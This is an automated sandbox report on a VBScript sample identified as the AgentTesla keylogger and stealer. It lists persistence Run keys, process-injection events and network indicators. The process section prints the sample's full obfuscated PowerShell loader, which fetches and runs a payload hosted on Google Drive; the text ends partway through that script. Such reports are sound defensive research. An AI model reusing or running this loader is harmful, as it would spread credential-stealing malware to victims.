Malware Analysis Report

2024-11-30 05:44

Sample ID 240619-sbce5ssdmg
Target 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
SHA256 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
Tags
agenttesla execution keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19

Threat Level: Known bad

The file 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Command and Scripting Interpreter: PowerShell

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-19 14:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 14:56

Reported

2024-06-19 14:59

Platform

win7-20240611-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1700 set thread context of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 916 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1700 wrote to memory of 2152 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2784 wrote to memory of 2832 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2832 wrote to memory of 2652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi 